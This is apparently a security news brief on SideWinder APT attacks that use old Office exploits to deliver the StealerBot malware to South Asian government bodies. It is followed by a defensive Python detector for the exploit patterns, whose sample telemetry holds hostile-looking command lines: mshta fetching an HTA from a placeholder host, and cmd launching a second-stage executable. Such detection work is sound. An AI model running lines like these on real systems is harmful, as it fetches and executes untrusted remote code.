New SideWinder APT attacks target South Asian ministries
Suspected Indian state-sponsored advanced persistent threat group SideWinder has used spear-phishing emails and geofenced payloads to compromise government entities in Bangladesh, Pakistan, and Sri Lanka with the StealerBot malware, reports The Hacker News.
According to an Acronis analysis, SideWinder distributed malicious emails carrying documents that exploit two old Microsoft Office remote code execution flaws, tracked as CVE-2017-0199 and CVE-2017-11882, to deliver the payloads that execute StealerBot. Beyond staging further malware, the .NET-based StealerBot provides a reverse shell and collects credentials, files, keystrokes, and screenshots. "SideWinder has demonstrated consistent activity over time, maintaining a steady pace of operations without prolonged inactivity, a pattern that reflects organizational continuity and sustained intent," said Acronis researchers, who noted that the group's use of geofenced and time-limited payloads indicates a high degree of control and precision.
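As an added defender-side illustration (not from the Acronis report or SC Media), the following Python heuristic classifies process-creation events for the two exploit patterns named above: the Equation Editor abused by CVE-2017-11882 spawning a child, and an Office application spawning a script/HTA host as in CVE-2017-0199 delivery. The event records, the field names, and the sample telemetry are constructed for the example.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
EQUATION_EDITOR = "eqnedt32.exe"   # Equation Editor, the CVE-2017-11882 target
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}


@dataclass
class ProcEvent:          # constructed, minimal process-creation record
    parent: str
    child: str
    cmdline: str


def classify(ev: ProcEvent) -> Optional[str]:
    parent, child = ev.parent.lower(), ev.child.lower()
    # CVE-2017-11882: EQNEDT32.EXE is started out-of-process via DCOM, so its
    # parent is normally svchost.exe rather than the Office app. The reliable
    # signal is therefore the Equation Editor spawning any child at all.
    if parent == EQUATION_EDITOR:
        return "CVE-2017-11882 pattern: Equation Editor spawned a child"
    # CVE-2017-0199: the Office application itself launches a script/HTA host.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return "CVE-2017-0199 pattern: Office app spawned a script host"
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[ProcEvent, str]]:
    """Return (event, reason) pairs for every event that matches a pattern."""
    return [(ev, tag) for ev in events if (tag := classify(ev)) is not None]


# Constructed sample telemetry; hostnames and file names are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "winword.exe", "WINWORD.EXE invoice.docx"),
    ProcEvent("winword.exe", "mshta.exe", "mshta.exe http://EXAMPLE-PLACEHOLDER/x.hta"),
    ProcEvent("svchost.exe", "eqnedt32.exe", "EQNEDT32.EXE -Embedding"),
    ProcEvent("eqnedt32.exe", "cmd.exe", "cmd.exe /c start stage2.exe"),
    ProcEvent("winword.exe", "splwow64.exe", "splwow64.exe 12288"),  # benign print helper
]

if __name__ == "__main__":
    for ev, reason in scan(SAMPLE_EVENTS):
        print(f"{reason}: {ev.parent} -> {ev.child} [{ev.cmdline}]")
```

The svchost.exe -> eqnedt32.exe launch is deliberately not flagged on its own, since that is how the Equation Editor normally starts; only what it spawns afterwards is suspicious.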